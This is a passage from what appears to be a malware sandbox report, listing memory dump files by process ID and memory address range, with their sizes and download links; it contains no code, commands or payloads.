memory/1984-639-0x0000000007A60000-0x0000000007A74000-memory.dmp

Filesize
80KB

Download
memory/1984-592-0x0000000005050000-0x0000000005678000-memory.dmp

Filesize
6.2MB

Download
memory/1984-641-0x0000000007A90000-0x0000000007A98000-memory.dmp

Filesize
32KB

Download
memory/1984-591-0x00000000025E0000-0x0000000002616000-memory.dmp

Filesize
216KB

Download
memory/1984-614-0x000000006EB50000-0x000000006EB9C000-memory.dmp

Filesize
304KB

Download
memory/1984-594-0x0000000004E20000-0x0000000004E86000-memory.dmp

Filesize
408KB

Download
memory/1984-611-0x0000000006160000-0x0000000006182000-memory.dmp

Filesize
136KB

Download
memory/1984-613-0x0000000007100000-0x0000000007132000-memory.dmp

Filesize
200KB

Download
memory/2680-280-0x00000000000F0000-0x000000000014A000-memory.dmp

Filesize
360KB

Download
memory/2936-644-0x0000000000400000-0x0000000000694000-memory.dmp

Filesize
2.6MB

Download
memory/3380-134-0x00000000055E0000-0x000000000567C000-memory.dmp

Filesize
624KB

Download
memory/3380-293-0x0000000072A0E000-0x0000000072A0F000-memory.dmp

Filesize
4KB

Download
memory/3380-129-0x0000000072A0E000-0x0000000072A0F000-memory.dmp

Filesize
4KB

Download
memory/3380-131-0x0000000000D70000-0x0000000000D78000-memory.dmp

Filesize
32KB

Download
memory/3736-913-0x00000169AD900000-0x00000169AD9B5000-memory.dmp

Filesize
724KB

Download
memory/3944-781-0x000001E682CF0000-0x000001E682D12000-memory.dmp

Filesize
136KB

Download
memory/3944-821-0x000001E69B480000-0x000001E69B48A000-memory.dmp

Filesize
40KB

Download
memory/3944-807-0x000001E69B460000-0x000001E69B47C000-memory.dmp

Filesize
112KB

Download
memory/3944-831-0x000001E69B4E0000-0x000001E69B4EA000-memory.dmp

Filesize
40KB

Download
memory/3944-817-0x000001E69B700000-0x000001E69B7B5000-memory.dmp

Filesize
724KB

Download
memory/3944-822-0x000001E69B4B0000-0x000001E69B4CC000-memory.dmp

Filesize
112KB

Download
memory/3944-830-0x000001E69B4D0000-0x000001E69B4D6000-memory.dmp

Filesize
24KB

Download
memory/3944-829-0x000001E69B4A0000-0x000001E69B4A8000-memory.dmp

Filesize
32KB

Download
memory/4088-304-0x0000000005B90000-0x0000000005BF6000-memory.dmp

Filesize
408KB

Download
memory/4100-553-0x0000000000400000-0x00000000004DD000-memory.dmp

Filesize
884KB

Download
memory/4100-643-0x0000000000400000-0x00000000004DD000-memory.dmp

Filesize
884KB

Download
memory/4152-542-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/4152-541-0x0000000000460000-0x0000000000552000-memory.dmp

Filesize
968KB

Download
memory/4508-828-0x000002252C940000-0x000002252C95A000-memory.dmp

Filesize
104KB

Download
memory/4508-827-0x000002252C8E0000-0x000002252C8EA000-memory.dmp

Filesize
40KB

Download
memory/5048-589-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/5048-238-0x0000000000DA0000-0x0000000000DB2000-memory.dmp

Filesize
72KB

Download
memory/5236-1084-0x000002935CB20000-0x000002935CBD5000-memory.dmp

Filesize
724KB

Download
memory/5696-939-0x0000027663710000-0x0000027663718000-memory.dmp

Filesize
32KB

Download
memory/6020-1192-0x0000000140000000-0x0000000140951000-memory.dmp

Filesize
9.3MB

Download
memory/6020-1259-0x0000000140000000-0x0000000140951000-memory.dmp

Filesize
9.3MB

Download